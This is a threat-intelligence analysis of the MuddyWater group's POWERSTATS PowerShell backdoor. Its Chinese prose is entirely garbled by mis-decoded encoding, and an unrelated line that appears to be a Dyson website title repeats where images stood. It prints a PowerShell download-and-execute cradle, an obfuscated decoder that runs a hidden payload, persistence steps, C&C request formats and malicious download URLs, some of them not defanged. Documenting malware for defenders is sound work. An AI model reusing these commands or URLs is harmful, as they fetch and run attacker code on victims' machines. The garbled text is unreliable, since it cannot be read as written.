APT×éÖ¯¡°MuddyWater£¨ÎÛË®£©¡±×îж¯Ïò·ÖÎö

Ðû²¼Ê±¼ä 2018-12-01
¡°MuddyWater£¨ÎÛË®£©¡±ÊÇÒ»¸öÀ´×ÔÓÚÒÁÀʵÄÖ÷ÒªÕë¶ÔÖж«µØÓò¹¥»÷µÄAPT×éÖ¯¡£¸Ã×éÖ¯Ö÷ÒªÀûÓÃPowershellÖ´ÐÐËùÓжñÒâ²Ù×÷£¬²¢ÔÚһϵÁÐÐж¯ÖÐÑÜÉú³öÁËËûÃǵÄרÓÐľÂí¡°POWERSTATS¡±¡£¸Ã×éÖ¯µÄ¹¥»÷Ä¿±êÖ÷Òª¼¯ÖÐÓÚÕþ¸®£¬Í¨ÐÅÓëʯÓÍÕâЩÁìÓò¡£


ÔÚ¶ÔÈÕ³£Ñù±¾µÄ¸ú×ÙÖУ¬ÎÒÃÇ·¢ÏÖÁËһЩеġ°MuddyWater¡±µÄÌØÖÖľÂí¡°POWERSTATS¡±£¬²¢»ù±¾È·¶¨ÕâЩÑù±¾ÎªMuddyWater×éÖ¯×îй¥»÷»î¶¯µÄ²úÎï¡£


ÔØºÉ·ÖÎö


×îй¥»÷ÈÔͨ¹ýÓʼþ;¾¶½ÓÄɶñÒâÎĵµµÄ·½Ê½²¢ÅäºÏÉç»á¹¤³Ìѧ½øÐÐͶ·Å¡£
 
¶«É­¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

¶«É­¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

Ïà¹ØÎĵµ¾ùǶÈëÁËÄ£ºýͼƬÒÔÒýÓÕÊܺ¦Õßµã»÷ÆôÓöñÒâºê´úÂ룬ÎĵµÖаüÂ޵ĶñÒâºê´úÂë»ùµ×Ï¸ËÆ£¬¶¼Ê¹ÓÃͬһÖÖËã·¨½øÐÐÊý¾Ý½âÃÜ¡£Pyhton½âÃÜ´úÂëÈçÏ£º
¡°¡±.join([chr(int(data[_:_+3]) - KEY) for _ in range(0,len(data),3)])


Êý¾Ý½âÃÜÖ®ºóÖ÷ÒªÖ´ÐÐÈçÏÂpowershell´úÂ룺
powershell -exec bypass -c ""IEX((New-Object Net.WebClient).DownloadString(\'URL'))


Ïà¹ØÎĵµµÄÏÂÔØµÄÁ´½Ó·Ö±ðÈçÏ£º
http://pazazta.com/app/icon[.]png
http://3cbc.net/dropbox/icon[.]icon
http://ohe.ie/cli/icon[.]png
http://ohe.ie/cp/icon[.]png


ÏÂÔØµÄÎļþ¾ùΪpowershell´úÂ룬ͨ¹ýʹÓÃpowershellÖ´ÐÐÕâЩÏÂÔØµÄ¹¥»÷ÔØºÉÀ´Ö´ÐÐÈç϶ñÒâ²Ù×÷£º


£¨1£©½«js±äÁ¿ÖеĴúÂëʹÓÃBase64±àÂë½âÂ룬²¢Ð´Èëµ½C:\Windows\Temp\temp.jpgÎļþÖС£


£¨2£©½«vbs±äÁ¿ÖдúÂëʹÓÃBase64±àÂë½âÂë²¢Óöþ½øÖÆÐÎʽдÈëµ½C:\Windows\temp\Windows.vbeÎļþÖУ¬»òÕß½«vbs±äÁ¿ÖеÄÊý¾ÝÖ±½ÓÒÔ¶þ½øÖÆÐÎʽдÈëµ½C:\Windows\temp\Windows.vbeÎļþÖС£


£¨3£©½«code±äÁ¿µÄÊý¾ÝÖ±½ÓдÈëµ½C:\ProgramData\Microsoft.dbÎļþÖС£


£¨4£©Æô¶¯C:\Windows\temp\Windows.vbe¡£


ÔÚÊͷŵÄÎļþÖУ¬Windows.vbe»áµ÷ÓÃcscript.exeÀ´Ö´ÐÐC:\\Windows\\Temp\\temp.jpgÖеÄJavascript´úÂ룬¸Ã´úÂë¾­¹ý»ìÏý£¬½â¿ª»ìÏýÖ®ºóÎÒÃÇ·¢ÏָôúÂëÖ÷ÒªÖ´ÐÐÈçϵÄpowershell´úÂ룺
powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\Microsoft.db);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));


¸Ã¶ÎPowershell´úÂëÓÃÓÚ½âÃÜMicrosoft.dbÖеÄÎļþ£¬²¢Ö´ÐнâÃܺóµÄ´úÂ룬½âÃܺóµÄpowershell»áÔٴνâÃÜÒ»¶ÎÊý¾Ý£¬¸ÃÊý¾ÝÏÈʹÓÃBase64½âÂ룬ȻºóÔÙ¶ÔÊý¾ÝʹÓýâѹËã·¨½øÐнâѹ£¬µÃµ½Ò»¶Î¾­¹ý´óÁ¿»ìÏýµÄpowershell´úÂ룬»ìÏýÒªÁì»ù±¾ÒÀ¿¿×Ö·û»»Ìæ»»£¬µ¹ÐòµÈ·½Ê½£¬½â¿ª»ìÏýºóΪ¸Ã×é֯רÓÐÌØÖÖľÂí¡°POWERSTATS¡±¡£


POWERSTATSľÂí·ÖÎö


POWERSTATSľÂíÊ×ÏÈ»áÉèÖÃһϵÁÐ×¢²á±íÏîÄ¿£¬À´½ûÓÃOfficeºê¾¯¸æºÍ±£»¤ÊÓͼ¡£ÕâÊÇΪÁËÈ·±£Î´À´µÄ¹¥»÷²»ÐèÒªÓû§½»»¥¡£ÉõÖÁ»¹ÔÊÐíºê´úÂë·ÃÎÊÄÚ²¿VBA¹¤¾ß£¬ÒÔ±ãÔÚ½«À´µÄ¹¥»÷ÖÐÖ´ÐиüÒþ±ÎµÄºê´úÂ룬ͬʱ½«
¡°C:\windows\system32\wscript.exeC:\Windows\temp\Windows.vbe¡±Ð´Èëµ½¿ª»ú×ÔÆôÏîMicrosoft EdgeÖУ¬È»ºóÉèÖÃÁËÒ»¸öÃûΪMicrosoft EdgeµÄ¶¨Ê±ÈÎÎñÀ´¶¨Ê±µ÷ÓÃwscript.exeÖ´ÐÐWindows.vbe£¬ÒԱ㱣֤¸Ã¶ñÒⷨʽÔÚϵͳÖеÄפÁôÓ붨ʱÔËÐС£


Ö®ºóPOWERSTATS½«Ö´ÐнÓÏÂÀ´µÄһϵÁжñÒâÐÐΪ£¬Ê×ÏÈPOWERSTATSľÂí»á´Ó×Ô¼ºÉèÖõÄÈý¸ö¼ÓÃܵÄÊý¾ÝÖÐËæ»ú³éѡһ¸ö½øÐнâÃÜ£¬½âÃܳöÀ´ÎªÐèÒª½øÐн»»¥µÄC&C·þÎñÆ÷µØÖ·£¬½âÃÜËã·¨ÈçÏÂ(Python)£º
"".join([chr(ord(a[_%len(KEY)])^ord(DecryptByBase64(Data)[_])) for _ in xrange(len(DecryptByBase64(Data)))])


½âÃܺóµÄC&CÈçÏÂ

¶«É­¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾


   ½Ó×Å£¬»á»ñȡһϵÁÐÓû§Êý¾Ý£¬Ê¹Óá±**¡±Æ´½Óµ½Ò»ÆðʹÓÃUTF-8±àÂ룬ȻºóÔÙ¼ÆËã³öMD5Öµ£¬×÷Ϊ´Ë´ÎµÄ»ñÈ¡µ½µÄÊý¾ÝµÄΨһ±êʶ£¬×îÖսṹÈçÏÂURL£º
[C&C]?t=[7d4580a3910c54d62b46f24c397c8d59]&f=s&type=info&id=global_key
È»ºó½«Ö®Ç°»ñÈ¡µ½µÄÓû§Êý¾Ý½øÐÐÉÏ´«£¬ÉÏ´«µÄÊý¾Ý¾­¹ý¼ÓÃÜ£¬¼ÓÃÜËã·¨µÄÈçÏ£º
 

¸ÃËã·¨¶Ôÿ¸ö×Ö·û½øÐмÓÃÜ£¬ÕâÖÖ·½Ê½µÄ¼ÓÃÜ×Ö·û»ù±¾²»´æÔÚ¿ÉÄæµÄÇé¿ö£¬µ«Êǵ¥¸ö×Ö·û´®Ê¹ÓÃËã·¨µÃµ½µÄ¼ÓÃÜ×Ö·ûÆäʵÊÇÏàͬµÄ£¬ÎÒÈÏΪ·þÎñÆ÷´æÔÚÒ»ÕÅ×Ö½ÚÌæ»»±íÀ´Ì滻ÿ¸ö¼ÓÃܺóµÄÊý¾Ý£¬ÔÚµÚÒ»´Î½«Êý¾ÝÉÏ´«Ö®ºó£¬Èç¹û·þÎñÆ÷·µ»Ø¡°OK¡±ÌåÏÖÕýÈ·½ÓÊÕÊý¾Ý£¬È»ºóÔÙÉú³É20¸öËæ»ú×Ö·û£¬¾­¹ýMD5¼ÓÃÜÖ®ºó£¬ÒÔÈçϵÄURL¸ñʽ·¢ËÍPOSTÇëÇ󣬷¢Ë͵ÄÊý¾ÝÎªËæ»úÉú³ÉµÄ20¸ö×Ö·û£¬À´±íÃ÷¿ÉÒÔ½øÐÐÏÂÒ»²½²Ù×÷¡£


[C&C]?t=[7d4580a3910c54d62b46f24c397c8d59]&f=s&type=live&id=global_key
Èç¹û·þÎñÆ÷·µ»ØOKÔòÌåÏÖ¿ÉÒÔ½øÐнÓÏÂÀ´µÄ²Ù×÷£¬È»ºó¶ñÒⷨʽ»áÏò·þÎñÆ÷½øÐÐÈçϵÄGETÇëÇó


[C&C]?t=[7d4580a3910c54d62b46f24c397c8d59]&f=g&type=cmd&id=global_key¡£


Èç¹û·þÎñÆ÷ÕýÈ·ÏìÓ¦£¬Æä·µ»ØµÄÊý¾Ý¸ñʽÈçÏ£º[ID]"~~!!~~"[Operand][Data]


ÆäÖвîÒìµÄ²Ù×÷Âë»áÓвîÒìµÄ¹¦Ð§£¬¶ÔÓ¦ÈçÏ£º

¶«É­¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾


Ö´ÐÐÍê¶ÔÓ¦µÄ¹¦Ð§Ö®ºó£¬½«·µ»ØÖµ½øÐÐBase64½øÐбàÂëÈ»ºóÒÔÈçϵĸñʽ½«Êý¾ÝÉÏ´«
[ID]:[Result]


Óë֮ǰ¹¥»÷µÄ¹ØÁª


ÔÚÓë½ñÄê10ÔÂÅû¶µÄMuddyWaterµÄ¹¥»÷Ñù±¾¶Ô±ÈºóÎÒÃÇ·¢ÏÖ£¬×îºóÖ´ÐÐÕæÕý¶ñÒâÐÐΪµÄPosershell´úÂëÓë±¾´ÎµÄ´úÂë»ù±¾Ò»Ö£¬°üÂÞÆä½âÃÜURLµÄËã·¨Óëkey£¬JavascriptÖнâÃÜPowershell´úÂëµÄËã·¨£¬ÓëC&C½»»¥µÄÖ¸ÁЧµÈ¡£ÎÒÃÇÐγÉÈç϶ÔÕÕ±í¡£
 
¶«É­¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾



¿ÉÒÔ·¢ÏÖ¸Ã×éÖ¯ÔÚ±¾´Î¹¥»÷ÖÐÖ÷Òª¸ÄÉÆÁËһЩ×îÖÕpowershell´úÂëµÄµ÷Óùý³Ì£¬Èøü¶àµÄ¹¥»÷ÔØºÉÇ¨ÒÆµ½C&C·þÎñÆ÷ÖУ¬ÕâÑùʹºóÐøµÄ²Ù×÷±äµÃÔ½·¢Áé»îºÍ³Ö¾Ã¡£


Ïà¹ØIOC£º
5935522717aee842433a5de9d228a715
ca9230a54f40a6a0fe52d7379459189c
0cf25597343240f88358c694d7ae7e0a
a256abb5da891f109acf8a496d9792c4
hxxp://pazazta.com/app/icon[.]png
hxxp://3cbc.net/dropbox/icon[.]icon
hxxp://ohe.ie/cli/icon[.]png
hxxp://ohe.ie/cp/icon[.]png
C:\\ProgramData\\Microsoft.db
C:\\ProgramData\\Microsoft.vbe
C:\\Windows\\Temp\\temp.jpg